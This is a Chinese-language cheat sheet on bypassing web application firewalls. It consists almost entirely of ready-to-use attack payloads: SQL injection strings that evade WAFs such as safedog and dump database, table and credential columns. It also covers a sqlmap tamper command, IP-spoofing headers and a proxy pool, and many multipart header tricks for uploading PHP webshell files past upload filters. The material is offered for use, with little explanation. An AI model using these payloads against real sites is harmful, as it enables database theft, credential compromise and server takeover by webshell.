一篇文章教给你Bypass学习基础

client-ip:1.1.1.1
x-forward-for:1.1.1.1

http://z.zcjun.com/
https://phpinfo.me/domain/
https://d.chinacycc.com/index.php?m=Login&a=index

项目地址：https://github.com/Python3WebSpider/ProxyPool

https://www.runoob.com/redis/redis-install.html

#开启redis服务
cd ./redis
redis-server redis.windows.conf

#运行脚本ProxyPool-master
cd ./ProxyPool-master
python run.py

接口地址：127.0.0.1:5555/random

access+asp空格：  %0a %0d %09 %20 + 

%%&%%%%%%%%%%%%%%%%%%%%%%%%%%0a
id=1&id=1&id=1&id=1&id=1&id=1&id=1 and 1=1

#在1-55000之间找特殊数字，这个数字表示数据库版本。数据库是4.45.09以上版本该语句才会被执行
id=-1%20union%20/*!44509select*/%201,2,3%23
id=-1%20union%20/*!44509select*/%201,%23x%0A/*!database*/(),3%23

#找数字列
showproducts.php?id=-13/*!10444union*//*!10444%23*/%0a/*!10444select*/1,2,3,4,5,6,7,8,9,10
#数据库名
showproducts.php?id=-13/*!10444union*//*!10444%23*/%0a/*!10444select*/1,database%23%0a(),3,4,5,6,7,8,9,10

#表名
showproducts.php?id=-13/*!10444union*//*!10444%23*/%0a/*!10444select*/1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=0x7879636d73

#字段名
showproducts.php?id=-13/*!10444union*//*!10444%23*/%0a/*!10444select*/1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x6d616e6167655f75736572

#字段内容
showproducts.php?id=-13/*!10444union*//*!10444%23*/%0a/*!10444select*/1,group_concat(m_name,m_pwd),3,4,5,6,7,8,9,10 from manage_user

#字段数
?id=1/*%00*/%23a%0A/*!/*!order*/+/*%00*/%23a%0A/*!/*!by+3*/--+

#数字列
?id=-1 union/*%00*/%23a%0A/*!/*!select 1,2,3*/;%23

#数据库
?id=-1+union/*%00*/%23a%0A/*!/*!select 1,database%23%0a(),3*/;%23

#表名
?id=-1+union/*%00*/%23a%0A/*!/*!select*/1,group_concat(%23%0atable_name),3 from information_schema.tables where table_schema=0x7365637572697479;%23

#字段名
?id=-1+union/*%00*/%23a%0A/*!/*!select*/1,group_concat(%23%0acolumn_name),3 from information_schema.columns where table_name=0x7573657273;%23

#字段内容
?id=-1+union/*%00*/%23a%0A/*!/*!select*/1,group_concat(%23%0a0x7E,username,password),3 from security.users;%23

#字段数：
?id=1/**&id=1%20order by 3%23*/

#数据库名
?id=1/**&id=-1%20union%20select%201,database(),3%23*/

#表名
?id=1/**&id=-1%20union%20select%201,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23*/

#字段名
?id=1/**&id=-1%20union%20select%201,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273%23*/

#字段内容
?id=1/**&id=-1%20union%20select%201,group_concat(0x7e,username,password),3 from users%23*/

#字段数
?id=1%20order%20%23%0a%20by%203%23

#数据库
?id=-1%20union%20all%23%0a%20select%201,database%23%0a(),3%23

#表名
?id=-1%20union%20all%23%0a%20select%201,group_concat(%23%0atable_name),3 from information_schema.tables where table_schema=0x7365637572697479%23

#字段名
?id=-1%20union%20all%23%0a%20select%201,group_concat(%23%0acolumn_name),3 from information_schema.columns where table_name=0x7573657273%23

#字段内容
?id=-1%20union%20all%23%0a%20select%201,group_concat(%23%0a0x7e,username,password),3 from users%23

#字段数
?id=1 order -- -a%0a by 3%23

#数据库
?id=-1 union-- -a%0a select 1,database-- -a%0a(),3%23

#表名
?id=-1 union-- -a%0a select 1,group_concat(-- -a%0atable_name),3 from information_schema.tables where table_schema=0x7365637572697479%23

#字段名
?id=-1 union-- -a%0a select 1,group_concat(-- -a%0acolumn_name),3 from information_schema.columns where table_name=0x7573657273%23

#字段内容
?id=-1 union-- -a%0a select 1,group_concat(-- -a%0a0x7e,username,password),3 from users%23

#数据库
?id=\Nunion/*!14444select*/1,database(%23%0a),3

sqlmap -u "http://192.168.198.129:86/Less-2/?id=1" --tamper=safedog.py --ramdom-agent --delay=0.5 

Content-Disposition: form-data; name="file"; filename="ian.php"
# 将form-data;修改为~form-data，即：
Content-Disposition: ~form-data; name="file"; filename="ian.php"

Content-Disposition: form-data; name="file"; filename="yjh.php"
Content-Type: application/octet-stream
#将Content-Disposition修改为content-Disposition
Content-Disposition: form-data; name="file"; filename="yjh.php"
#将form-data修改为Form-data
Content-Disposition: Form-data; name="file"; filename="yjh.php"
#将Content-Type修改为content-Type
content-Type: application/octet-stream

Content-Disposition: form-data; name="file"; filename="yjh.php"
Content-Type: application/octet-stream
将Content-Disposition: form-data //冒号后面 增加或减少一个空格
将form-data; name="file";   //分号后面 增加或减少一个空格
将Content-Type: application/octet-stream //冒号后面 增加一个空格

看Content-Disposition: form-data; name="file"; filename="yjh3.php"
将 form-data 修改为   f+orm-data
将 from-data 修改为   form-d+ata

<form action="https://www.xxx.com/xxx.asp(php)" method="post"
name="form1" enctype="multipart/form‐data">
<input name="FileName1" type="FILE" class="tx1" size="40">
<input name="FileName2" type="FILE" class="tx1" size="40">
<input type="submit" name="Submit" value="上传">
</form>

Content-Disposition: form-data; name="file"; filename="yjh.php"
//通过替换form-data 为*来绕过
Content-Disposition: *; name="file"; filename="yjh.php"

源代码:
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png
绕过内容如下：
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png
C.php"
删除掉ontent-Type: image/jpeg只留下c，将.php加c后面即可，但是要注意额，双引号要跟着c.php".

原内容：
Content-Type: multipart/form-data; boundary=---------------------------471463142114
修改后:
Content-Type: multipart/form-data; boundary =---------------------------471463142114
boundary后面加入空格。

使用UTF-16、Unicode、双URL编码等等

Content-Disposition: form-data; name="up_picture"; filename="xss.jpg .Php"
或者：
filename='1.php(回车)'

源代码：
Content-Disposition: form-data; name="img_crop_file"; filename="1.jpg .Php"Content-Type: image/jpeg
修改如下：
Content-Disposition: form-data; name="img_crop_file"; filename="1.php"
将=号这里回车删除掉Content-Type: image/jpeg即可绕过。

源代码:
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png
绕过内容如下：
Content- Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png
Content-Disposition 修改为 Content-空格Disposition

Content- Disposition: form-data; name="upload"; filename==="1.php"

Content- Disposition: form-data; name="up_picture"; filename==="123.
11.php"